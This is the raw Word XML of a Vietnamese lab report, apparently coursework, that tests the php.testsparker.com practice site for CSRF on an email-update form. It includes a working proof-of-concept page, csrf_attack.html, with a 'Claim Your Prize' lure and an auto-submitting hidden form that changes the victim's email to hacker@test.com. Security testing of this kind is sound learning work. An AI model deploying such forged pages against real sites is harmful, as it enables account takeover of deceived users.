          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu</w:t>
      </w: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: Kiểm tra lỗ hổng CSRF trên chức năng thay đổi thông tin người dùng (giả định là cập nhật email).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CC700" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1. Các bước thực hiện kiểm thử CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BB20F1" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 1: Xác định chức năng nhạy cảm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EBA481" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AE25B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink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 và tìm kiếm một chức năng nhạy cảm, chẳng hạn như biểu mẫu (form) để thay đổi thông tin tài khoản (email, mật khẩu, hoặc hồ sơ người dùng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C12B25F" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Giả định: Trang có một biểu mẫu cập nhật email tại /update_profile với các trường: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6451A141" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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email: Trường nhập email mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4240A" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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submit: Nút gửi yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76075CE9" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Phương thức: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13844937" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Action: /update_profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F96C1D" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bước 2: Kiểm tra cơ chế bảo vệ CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB58A05" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Mở trình duyệt, sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w: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 (F12) để kiểm tra request khi gửi biểu mẫu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727CDAD3" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Xem mã nguồn HTML của biểu mẫu để tìm trường csrf_token hoặc các biện pháp bảo vệ khác (như token ẩn).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3B7FB" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Quan sát: Nếu không có CSRF token hoặc token không thay đổi mỗi phiên, trang có khả năng dính lỗ hổng CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15DE3E" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bước 3: Tạo yêu cầu hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBC3FE" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Đăng nhập vào </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AE25B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink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 với tài khoản hợp lệ (giả định: user/password).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079ACE74" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Điền biểu mẫu cập nhật email (ví dụ: newemail@test.com) và gửi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEF030" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Sử dụng DevTools để ghi lại request POST: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181362E" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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URL: http://php.testsparker.com/update_profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35086D43" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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Dữ liệu: email=newemail@test.com&amp;submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54620F" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Xác nhận: Email được cập nhật thành công, chứng minh chức năng hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03428E34" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bước 4: Tạo trang HTML giả mạo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B560F93" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Tạo một file HTML (csrf_attack.html) để gửi yêu cầu giả mạo thay đổi email: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D7CC1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>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7E642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>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D94C44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 xml:space="preserve">    &lt;h1&gt;Click to Claim Your Prize!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024FA1D3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 xml:space="preserve">    &lt;form action="http://php.testsparker.com/update_profile" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FFDC51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 xml:space="preserve">        &lt;input type="hidden" name="email" value="hacker@test.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3DFE7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 xml:space="preserve">        &lt;input type="hidden" name="submit" value="Submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A16E8C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 xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AAB3B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 xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27BD04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 xml:space="preserve">        document.forms[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B2057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 xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216473F0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>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C078DC" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B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141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E94C03" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Lưu file này trên máy tính (ví dụ: C:\Users\YourName\Desktop\csrf_attack.html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081602DC" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Trang này giả mạo một liên kết hấp dẫn (“Claim Your Prize”) để lừa người dùng truy cập, sau đó tự động gửi yêu cầu POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785763" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bước 5: Thực hiện tấn công CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD43E9" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Đăng nhập vào </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AE25B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink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 với tài khoản người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E31E68" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Mở file csrf_attack.html trong trình duyệt (kéo file vào trình duyệt hoặc mở qua file://).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651250AC" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Trang sẽ tự động gửi yêu cầu POST để thay đổi email thành hacker@test.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADCEF9" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kiểm tra lại tài khoản trên </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AE25B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve"> để xem email có bị thay đổi hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9DCEE" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bước 6: Phân tích kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD7253" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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Nếu email thay đổi thành hacker@test.com mà không cần xác nhận từ người dùng, trang có lỗ hổng CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7A827" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:num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  <w:r w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Ghi lại các chi tiết request và phản hồi trong DevTools để làm bằng chứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648A9BA" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00316734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lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734F8E65" w14:textId="327FF396" w:rsidR="00BF2D04" w:rsidRDefault="00BF2D04" w:rsidP="00BF2D04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515F0BC9" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00BF2D04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AE25B9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0611"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D91C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B40E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A68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1BB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B57C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4F2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166AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7538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83C0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33F2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B0708"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C98A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403F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CB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63BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5054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4359"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1A2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71B7679"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="922A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94F42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5D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F2382"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8A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7330F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4B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14E98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C66B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00CA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E2604"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CD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C64C06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8200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859C5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77700">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1719932011">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="429588796">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2060860679">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="480930206">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="831331221">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="757211672">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="378209257">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1264991032">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2142457156">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1344355518">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="140082932">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1370882513">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="326132285">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="636492595">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="375811407">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="368266519">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2012297082">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="900168878">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="783884733">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="817191683">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1763061592">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="835340948">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1231232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41198"/>
    <w:rsid w:val="00045E2B"/>
    <w:rsid w:val="00062932"/>
    <w:rsid w:val="000E46B6"/>
    <w:rsid w:val="000F0BC4"/>
    <w:rsid w:val="000F4182"/>
    <w:rsid w:val="00101F8F"/>
    <w:rsid w:val="00135C7B"/>
    <w:rsid w:val="00155C7C"/>
    <w:rsid w:val="00160E76"/>
    <w:rsid w:val="00161FCE"/>
    <w:rsid w:val="001761C8"/>
    <w:rsid w:val="00177820"/>
    <w:rsid w:val="00196C08"/>
    <w:rsid w:val="001B523B"/>
    <w:rsid w:val="001D4A4C"/>
    <w:rsid w:val="001E2902"/>
    <w:rsid w:val="001E45D1"/>
    <w:rsid w:val="001F44D1"/>
    <w:rsid w:val="00214C54"/>
    <w:rsid w:val="00234715"/>
    <w:rsid w:val="00256B2A"/>
    <w:rsid w:val="002D76EF"/>
    <w:rsid w:val="002F3127"/>
    <w:rsid w:val="002F5627"/>
    <w:rsid w:val="003023BA"/>
    <w:rsid w:val="00316734"/>
    <w:rsid w:val="00325CFD"/>
    <w:rsid w:val="00327DC9"/>
    <w:rsid w:val="00367DC6"/>
    <w:rsid w:val="0039394F"/>
    <w:rsid w:val="003A7793"/>
    <w:rsid w:val="003E2603"/>
    <w:rsid w:val="003F65F6"/>
    <w:rsid w:val="0042255E"/>
    <w:rsid w:val="004531EF"/>
    <w:rsid w:val="00463D55"/>
    <w:rsid w:val="004737FC"/>
    <w:rsid w:val="004953F1"/>
    <w:rsid w:val="004B5029"/>
    <w:rsid w:val="004D49F1"/>
    <w:rsid w:val="004E4785"/>
    <w:rsid w:val="004F2A41"/>
    <w:rsid w:val="0054214A"/>
    <w:rsid w:val="005A67FF"/>
    <w:rsid w:val="005E74CB"/>
    <w:rsid w:val="005F04D5"/>
    <w:rsid w:val="00621372"/>
    <w:rsid w:val="00653734"/>
    <w:rsid w:val="00653F88"/>
    <w:rsid w:val="006B55B0"/>
    <w:rsid w:val="006D2DA3"/>
    <w:rsid w:val="006E0C33"/>
    <w:rsid w:val="006F46F8"/>
    <w:rsid w:val="00700BCE"/>
    <w:rsid w:val="007725AD"/>
    <w:rsid w:val="00794653"/>
    <w:rsid w:val="007A096A"/>
    <w:rsid w:val="007A12CA"/>
    <w:rsid w:val="00802921"/>
    <w:rsid w:val="008079C0"/>
    <w:rsid w:val="00830631"/>
    <w:rsid w:val="00841A3A"/>
    <w:rsid w:val="00856C7B"/>
    <w:rsid w:val="00885A2F"/>
    <w:rsid w:val="008A2D80"/>
    <w:rsid w:val="008C1C95"/>
    <w:rsid w:val="008C6A30"/>
    <w:rsid w:val="008D2A9F"/>
    <w:rsid w:val="008E5273"/>
    <w:rsid w:val="008F0FED"/>
    <w:rsid w:val="008F2A1E"/>
    <w:rsid w:val="008F61CC"/>
    <w:rsid w:val="009362DA"/>
    <w:rsid w:val="00937FE0"/>
    <w:rsid w:val="0094604D"/>
    <w:rsid w:val="00951C1E"/>
    <w:rsid w:val="00985C05"/>
    <w:rsid w:val="009E2B9A"/>
    <w:rsid w:val="009E4E26"/>
    <w:rsid w:val="00A04C53"/>
    <w:rsid w:val="00A213AC"/>
    <w:rsid w:val="00A26001"/>
    <w:rsid w:val="00A26182"/>
    <w:rsid w:val="00A62E55"/>
    <w:rsid w:val="00A867DD"/>
    <w:rsid w:val="00AD25D3"/>
    <w:rsid w:val="00AE25B9"/>
    <w:rsid w:val="00AE43CD"/>
    <w:rsid w:val="00AF19BA"/>
    <w:rsid w:val="00B1637B"/>
    <w:rsid w:val="00B457F6"/>
    <w:rsid w:val="00BE3371"/>
    <w:rsid w:val="00BF2D04"/>
    <w:rsid w:val="00BF4FAA"/>
    <w:rsid w:val="00C22DD8"/>
    <w:rsid w:val="00C27FFB"/>
    <w:rsid w:val="00C84A81"/>
    <w:rsid w:val="00CC3443"/>
    <w:rsid w:val="00CF7DC5"/>
    <w:rsid w:val="00D05921"/>
    <w:rsid w:val="00D4581D"/>
    <w:rsid w:val="00D907C6"/>
    <w:rsid w:val="00D9621C"/>
    <w:rsid w:val="00DA065D"/>
    <w:rsid w:val="00DB1853"/>
    <w:rsid w:val="00DD25D3"/>
    <w:rsid w:val="00DD4CCF"/>
    <w:rsid w:val="00DE43CF"/>
    <w:rsid w:val="00E03545"/>
    <w:rsid w:val="00E1131E"/>
    <w:rsid w:val="00E20BD6"/>
    <w:rsid w:val="00E228FA"/>
    <w:rsid w:val="00E2780F"/>
    <w:rsid w:val="00E6220B"/>
    <w:rsid w:val="00E879F1"/>
    <w:rsid w:val="00EE67D6"/>
    <w:rsid w:val="00EF1EFF"/>
    <w:rsid w:val="00F333DF"/>
    <w:rsid w:val="00F525CE"/>
    <w:rsid w:val="00F70FCA"/>
    <w:rsid w:val="00F8748C"/>
    <w:rsid w:val="00FA3A8A"/>
    <w:rsid w:val="00FB4566"/>
    <w:rsid w:val="00FD7B8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BF7F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F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2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php.testsparker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php.testsparker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hp.testsparker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php.testsparker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php.testspark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php.testspar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252D-053B-4126-B794-83565C29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Anh Tuấn Trần</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-25T05:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-25T07:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>